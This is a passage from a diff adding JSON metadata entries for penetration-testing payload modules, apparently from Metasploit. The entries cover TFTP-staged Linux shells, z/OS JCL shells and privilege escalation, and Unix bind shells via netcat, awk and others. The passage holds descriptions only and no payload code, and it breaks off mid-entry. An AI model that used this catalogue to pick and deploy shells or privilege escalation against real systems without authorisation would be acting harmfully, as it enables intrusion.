"linux/x86/shell/bind_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_ipv6_tcp" + }, + "payload_cmd/linux/tftp/x86/shell/bind_ipv6_tcp_uuid": { + "name": "TFTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/tftp/x86/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "kris katterjohn ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": 
null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" + }, + "payload_cmd/linux/tftp/x86/shell/bind_nonx_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Stager", + "fullname": "payload/cmd/linux/tftp/x86/shell/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/bind_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_nonx_tcp" + }, + "payload_cmd/linux/tftp/x86/shell/bind_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Stager (Linux x86)", + "fullname": 
"payload/cmd/linux/tftp/x86/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for a connection (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/bind_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_tcp" + }, + "payload_cmd/linux/tftp/x86/shell/bind_tcp_uuid": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/tftp/x86/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for a connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/bind_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_tcp_uuid" + }, + "payload_cmd/linux/tftp/x86/shell/find_tag": { + "name": "TFTP Fetch, Linux Command Shell, Find Tag Stager", + "fullname": "payload/cmd/linux/tftp/x86/shell/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nUse an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/find_tag", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/find_tag" + }, + "payload_cmd/linux/tftp/x86/shell/reverse_ipv6_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/linux/tftp/x86/shell/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "kris katterjohn " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to attacker over IPv6", + 
"references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_ipv6_tcp" + }, + "payload_cmd/linux/tftp/x86/shell/reverse_nonx_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/x86/shell/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/reverse_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_nonx_tcp" + }, + "payload_cmd/linux/tftp/x86/shell/reverse_tcp": { + "name": "TFTP Fetch, Linux Command 
Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/x86/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt ", + "tkmru" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_tcp" + }, + "payload_cmd/linux/tftp/x86/shell/reverse_tcp_uuid": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/x86/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell/reverse_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_tcp_uuid" + }, + "payload_cmd/linux/tftp/x86/shell_bind_ipv6_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/tftp/x86/shell_bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "kris katterjohn " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection over IPv6 and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell_bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell_bind_ipv6_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x86/shell_bind_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/tftp/x86/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + 
"autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x86/shell_bind_tcp_random_port": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Random Port Inline", + "fullname": "payload/cmd/linux/tftp/x86/shell_bind_tcp_random_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Geyslan G. Bem ", + "Aleh Boitsau " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm", + "EDB-41631" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell_bind_tcp_random_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell_bind_tcp_random_port", + "staged": false + }, + "payload_cmd/linux/tftp/x86/shell_find_port": { + "name": "TFTP Fetch, Linux Command Shell, Find Port Inline", + "fullname": 
"payload/cmd/linux/tftp/x86/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell_find_port", + "staged": false + }, + "payload_cmd/linux/tftp/x86/shell_find_tag": { + "name": "TFTP Fetch, Linux Command Shell, Find Tag Inline", + "fullname": "payload/cmd/linux/tftp/x86/shell_find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a shell on an established connection (proxy/NAT safe)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell_find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell_find_tag", + "staged": 
false + }, + "payload_cmd/linux/tftp/x86/shell_reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/x86/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle ", + "joev " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x86/shell_reverse_tcp_ipv6": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/tftp/x86/shell_reverse_tcp_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Matteo Malvica " + ], + "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to attacker and spawn a command shell over IPv6", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/x86/shell_reverse_tcp_ipv6", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/x86", + "adapted_refname": "linux/x86/shell_reverse_tcp_ipv6", + "staged": false + }, + "payload_cmd/mainframe/apf_privesc_jcl": { + "name": "JCL to Escalate Privileges", + "fullname": "payload/cmd/mainframe/apf_privesc_jcl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Bigendian Smalls", + "Ayoub" + ], + "description": "Elevate privileges for user. Adds\n SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using\n an unsecured/updateable APF authorized library (APFLIB) and updating\n the user's ACEE using this program/library. Note: This privesc only\n works with z/OS systems using RACF, no other ESM is supported.", + "references": [], + "platform": "Mainframe", + "arch": "cmd", + "rport": 21, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/mainframe/apf_privesc_jcl.rb", + "is_install_path": true, + "ref_name": "cmd/mainframe/apf_privesc_jcl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/mainframe/bind_shell_jcl": { + "name": "Z/OS (MVS) Command Shell, Bind TCP", + "fullname": "payload/cmd/mainframe/bind_shell_jcl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Bigendian Smalls" + ], + "description": "Provide JCL which creates a bind shell\n This implementation does not include ebcdic character translation,\n so a client with translation capabilities is required. 
MSF handles\n this automatically.", + "references": [], + "platform": "Mainframe", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/mainframe/bind_shell_jcl.rb", + "is_install_path": true, + "ref_name": "cmd/mainframe/bind_shell_jcl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/mainframe/generic_jcl": { + "name": "Generic JCL Test for Mainframe Exploits", + "fullname": "payload/cmd/mainframe/generic_jcl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Bigendian Smalls" + ], + "description": "Provide JCL which can be used to submit\n a job to JES2 on z/OS which will exit and return 0. This\n can be used as a template for other JCL based payloads", + "references": [], + "platform": "Mainframe", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/mainframe/generic_jcl.rb", + "is_install_path": true, + "ref_name": "cmd/mainframe/generic_jcl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/mainframe/reverse_shell_jcl": { + "name": "Z/OS (MVS) Command Shell, Reverse TCP", + "fullname": "payload/cmd/mainframe/reverse_shell_jcl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Bigendian Smalls" + ], + "description": "Provide JCL which creates a reverse shell\n This implementation does not include ebcdic character translation,\n so a client with translation capabilities is required. 
MSF handles\n this automatically.", + "references": [], + "platform": "Mainframe", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb", + "is_install_path": true, + "ref_name": "cmd/mainframe/reverse_shell_jcl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/adduser": { + "name": "Add user with useradd", + "fullname": "payload/cmd/unix/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Nick Cottrell " + ], + "description": "Creates a new user. By default the new user is set with sudo\n but other options exist to make the new user automatically\n root but this is not automatically set since the new user will\n be treated as root (and login may be difficult). 
The new user\n can also be set as just a standard user if desired.", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-01 12:30:26 +0000", + "path": "/modules/payloads/singles/cmd/unix/adduser.rb", + "is_install_path": true, + "ref_name": "cmd/unix/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_awk": { + "name": "Unix Command Shell, Bind TCP (via AWK)", + "fullname": "payload/cmd/unix/bind_awk", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "espreto ", + "Ulisses Castro " + ], + "description": "Listen for a connection and spawn a command shell via GNU AWK", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_awk.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_awk", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_aws_instance_connect": { + "name": "Unix SSH Shell, Bind Instance Connect (via AWS API)", + "fullname": "payload/cmd/unix/bind_aws_instance_connect", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an SSH shell using AWS Instance Connect", + "references": [ + "URL-https://www.sempervictus.com/single-post/a-serial-case-of-air-on-the-side-channel" + ], + "platform": "Unix", + "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, 
ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_aws_instance_connect.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_aws_instance_connect", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_busybox_telnetd": { + "name": "Unix Command Shell, Bind TCP (via BusyBox telnetd)", + "fullname": "payload/cmd/unix/bind_busybox_telnetd", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Matthew Kienow " + ], + "description": "Listen for a connection and spawn a command shell via BusyBox telnetd", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_busybox_telnetd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_inetd": { + "name": "Unix Command Shell, Bind TCP (inetd)", + "fullname": "payload/cmd/unix/bind_inetd", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Listen for a connection and spawn a command shell (persistent)", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + 
"autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_inetd.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_inetd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_jjs": { + "name": "Unix Command Shell, Bind TCP (via jjs)", + "fullname": "payload/cmd/unix/bind_jjs", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "conerpirate", + "bcoles " + ], + "description": "Listen for a connection and spawn a command shell via jjs", + "references": [ + "URL-https://gtfobins.github.io/gtfobins/jjs/", + "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/", + "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html" + ], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_jjs.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_jjs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_lua": { + "name": "Unix Command Shell, Bind TCP (via Lua)", + "fullname": "payload/cmd/unix/bind_lua", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "xistence " + ], + "description": "Listen for a connection and spawn a command shell via Lua", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": 
"/modules/payloads/singles/cmd/unix/bind_lua.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_lua", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_netcat": { + "name": "Unix Command Shell, Bind TCP (via netcat)", + "fullname": "payload/cmd/unix/bind_netcat", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "m-1-k-3", + "egypt ", + "juan vazquez " + ], + "description": "Listen for a connection and spawn a command shell via netcat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_netcat.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_netcat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/unix/bind_netcat_gaping": { + "name": "Unix Command Shell, Bind TCP (via netcat -e)", + "fullname": "payload/cmd/unix/bind_netcat_gaping", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Listen for a connection and spawn a command shell via netcat", + "references": [], + "platform": "Unix", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb", + "is_install_path": true, + "ref_name": "cmd/unix/bind_netcat_gaping", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 
